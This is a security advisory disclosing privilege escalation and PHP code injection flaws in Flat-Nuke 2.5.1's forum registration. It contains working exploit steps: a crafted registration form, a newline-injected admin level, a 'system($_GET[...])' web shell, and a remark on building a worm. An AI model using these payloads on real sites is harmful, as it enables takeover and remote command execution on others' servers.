<<< Date Index >>>     <<< Thread Index >>>

Multiple Vulnerabilities in FlatNuke




*************************************************************
* CODEBUG Labs
* Advisory #6
* Title: Multiple Vulnerabilities in Flat-nuke
* Author: Pierquinto 'Mantra' Manco
* English Version: David 'hanska' Paleino
* Product: Flat-Nuke 2.5.1
* Type: Multiple Vulnerabilities
* Web: http://www.codebug.org
*
**************************************************************

-) Software Page (www.flatnuke.org)
"FlatNuke is a CMS (Content Management System) which doesn't use any DBMS, in 
favour of text files only (from this fact comes its name). The last stable 
version of FlatNuke is 2.5.1."

-) The vulnerable function
The vulnerability stays in the index.php file in flatnuke's forum/ directory, 
which is located in the scripts' main directory:

<?
    if(!file_exists("users/$nome.php")) {
        if(($nome == "") || ($regpass == "") || (stristr($nome, "")) || 
(strlen($nome) > 13) || (stristr($nome,"\"")) || (stristr($nome, "\\")) || 
($regpass != $reregpass)){
                print _FERRCAMPO . "<br><a 
href=\"javascript:history.back()\">&lt;&lt;" . _INDIETRO . "</a>";
    }
    else {
        $nome = str_replace("<", "", $nome);
        $nome = str_replace(">", "", $nome);
        $nome = stripslashes($nome);
        $regpass = str_replace("<", "", $regpass);
        $regpass = str_replace(">", "", $regpass);
        $anag = str_replace(">", "", $anag);
        $anag = str_replace("<", "", $anag);
        $anag = stripslashes($anag);
        $email = str_replace("<", "", $email);
        $email = str_replace(">", "", $email);
        $email = stripslashes($email);
        $homep = str_replace("<", "", $homep);
        $homep = str_replace(">", "", $homep);
        $homep = stripslashes($homep);
        $prof = str_replace("<", "", $prof);
        $prof = str_replace(">", "", $prof);
        $prof = stripslashes($prof);
        $prov = str_replace("<", "", $prov);
        $prov = str_replace(">", "", $prov);
        $prov = stripslashes($prov);
        $ava = str_replace("<", "", $ava);
        $ava = str_replace(">", "", $ava);
        if ($ava == "")
                $ava="blank.png";

        if ($url_avatar != "") {
                $ava = $url_avatar;
                $ava = str_replace("<", "", $ava);
                $ava = str_replace(">", "", $ava);
        }
        else {
                $ava = str_replace("<", "", $ava);
                $ava = str_replace(">", "", $ava);
                $ava = "images/" . $ava;
        }

        $firma = str_replace("<", "", $firma);
        $firma = str_replace(">", "", $firma);
        $firma = stripslashes($firma);

        # Stores the password in a MD5 hash.
        $regpass = md5($regpass);

    
        $firma = str_replace("\n", "<br>", $firma);
        $fp = fopen("users/$nome.php", "w");
        // these fwrite() don't need any concurrent
        // access check since the user can only access
        // his own file
        fwrite($fp, "<?\n");
        fwrite($fp, "#$regpass\n");

        fwrite($fp, "#$anag\n");
        fwrite($fp, "#$email\n");
        fwrite($fp, "#$homep\n");
        fwrite($fp, "#$prof\n");
        fwrite($fp, "#$prov\n");
        fwrite($fp, "#$ava\n");
        fwrite($fp, "#$firma\n");
        fwrite($fp, "#$level\n");
        fwrite($fp, "?>\n");
        fclose($fp);
        ...
?>

- - ) Remote Privilege Escalation
Make a HTML page with the following code:

<form action="http://www.sitewithflatnuke.org/forum/index.php"; method=post 
name="registra">
        <input type=hidden name=op value=reg>
        Username*: <input name=nome><br>    
        Password*: <input name="regpass" type="password"><br>
        Password*: <input name="reregpass" type="password"><br>
        Name: <input name=anag><br>
        E-mail: <input name=email><br>
        Homepage: <input name=homep value="http://";><br>
        Job: <input name=prof><br>
        Country: <input name=prov><br>
        <select name="ava">
                <option value="">----</option>
                <option value="blank.png">blank.png</option>
        </select>
        <br><br>
        Or remote image URL:<br><br>
        <textarea name="url_avatar" rows=5 cols=23></textarea>
        <br>
        Signature: <textarea name=firma rows=5 cols=23></textarea>
        <center>
                <input type=submit value="Send">
        </center>
</form>

Once you open the HTML page in ANY web browser, you need to fill in every field 
but the one called url_avatar, which we will use to register ourselves as 
administrators.
In the "url_avatar" field, press Enter at least twice, then write #10, this way 
we will make directives registering us as administrators precede that ones 
which would register us as normal users.
All this is possible because the script, in the registration function, does not 
check the values contained in the text fields that we have opportunely changed 
into textarea fields.


- - ) PHP Code Injection
This bug came into evidence while I was writing about the Remote Privilege 
Escalation:

<form action="http://www.sitewithflatnuke.org/forum/index.php"; method=post 
name="registra">
        <input type=hidden name=op value=reg>
        Username*: <input name=nome><br>    
        Password*: <input name="regpass" type="password"><br>
        Password*: <input name="reregpass" type="password"><br>
        Name: <input name=anag><br>
        E-mail: <input name=email><br>
        Homepage: <input name=homep value="http://";><br>
        Job: <input name=prof><br>
        Country: <input name=prov><br>
        <select name="ava">
                <option value="">----</option>
                <option value="blank.png">blank.png</option>
        </select>
        <br><br>
        Or remote image URL:<br><br>
        <textarea name="url_avatar" rows=5 cols=23></textarea>
        <br>
        Signature:
        <textarea name=firma rows=5 cols=23></textarea>
        <center>
                <input type=submit value="Send">
        </center>
</form>


Let's open again our HTML page from a browser and just fill in the fields like 
we did for the Remote Privilege Escalation bug. We will now use our 
"url_avatar" textarea to inject malicious code.
At this point, press Enter at least once and put out malicious PHP code, for 
example:

        echo system($_GET[mantra]);

This command, for example, will give us a shell accessible from:
        
        
http://www.sitewithflatnuke.org/forum/users/$yourforumnickname.php?mantra=command_to_execute

- ) Patch
To correct these vulnerabilities some further parameters-checking should be 
implemented, and the users registration and mantainance system should be 
restructured.

-) Notes
Through the use of Google or any other kind of search engine it is possible to 
create a worm, like Santy for phpBB, and spread it over each system running 
FlatNuke, with a high probability of causing damages.

*****************************************************************
        http://www.codebug.org
*****************************************************************